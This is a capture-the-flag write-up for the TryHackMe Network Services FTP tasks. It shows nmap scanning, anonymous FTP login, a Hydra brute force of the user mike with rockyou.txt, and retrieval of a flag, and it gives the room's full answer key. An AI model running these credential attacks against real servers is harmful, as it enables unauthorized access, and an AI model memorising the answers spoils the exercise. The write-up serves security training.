This article covers enumerating and exploiting FTP in the TryHackMe Network Services room, part of the CompTIA Pentest+ certification path. It focuses on Task 9 & Task 10, showing how to find and exploit FTP vulnerabilities using anonymous login and brute force attacks.

🔹 What is FTP?

FTP (File Transfer Protocol) is a standard network protocol used to transfer files between a client and a server over a network, such as the Internet. It allows users to upload, download, and manage files on remote servers. FTP operates on a client-server model and typically uses ports 20 (data transfer) and 21 (command control).

There are different types of FTP:

  • Plain FTP (Unencrypted, not secure)
  • FTPS (FTP Secure, uses SSL/TLS encryption)
  • SFTP (Secure File Transfer Protocol, uses SSH for secure transfers)

It is commonly used for website management, file sharing, and backup storage.

FTP Penetration Testing

1️⃣ Scanning the Target Machine

  • Use Nmap to discover open ports:
sudo nmap -sV [target_ip]
  • The scan reveals that port 21 (FTP) is open.

2️⃣ Checking for Anonymous FTP Access

  • Connect to the FTP server: 
ftp [target_ip]

Try logging in with:

Username: anonymous  
Password: anonymous

If successful, anonymous FTP access is enabled, meaning files can be downloaded.

3️⃣ Finding Useful Information

  • List directory contents:
ls -la

Download files from the FTP server:

get public_notice.txt

Checking the file:

cat public_notice.txt

The file contains the name “Mike”, which could be a valid username.

4️⃣ Brute Forcing FTP Credentials with Hydra

  • Using Hydra to crack the password for Mike:
sudo hydra -l mike -P /usr/share/wordlists/rockyou.txt ftp://[target_ip] -V
  • Hydra finds the password: “password”.

5️⃣ Logging in with Privileged FTP Credentials

  • Log in using the cracked credentials:
ftp [target_ip]
Username: mike  
Password: password
  • Now we have access to Mike’s home directory, where another file (ftp.txt) is stored.

6️⃣ Retrieving the Flag

  • Download the ftp.txt file:
get ftp.txt

View the file to get the flag:

cat ftp.txt

Key Takeaways

Anonymous FTP access is a security risk.
Brute-force attacks (Hydra) can crack weak passwords.
Enumeration is key to finding valid usernames.

TryHackMe FTP Network Services | Room Answers

What communications model does FTP use?

client-server

What’s the standard FTP port?

21

How many modes of FTP connection are there?

2

Run an nmap scan of your choice.

How many ports are open on the target machine?

1

What port is ftp running on?

21

What variant of FTP is running on it?

vsftpd

Great, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing “ftp [IP]” into the console, and entering “anonymous”, and no password when prompted.

What is the name of the file in the anonymous FTP directory?

PUBLIC_NOTICE.txt

What do we think a possible username
could be?
mike


What is the password for the user “mike”?

password

Bingo! Now, let’s connect to the FTP server as this user using “ftp [IP]” and entering the credentials when prompted

No answer needed

What is ftp.txt?

THM{y0u_g0t_th3_ftp_fl4g}

Video Walkthrough

, , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles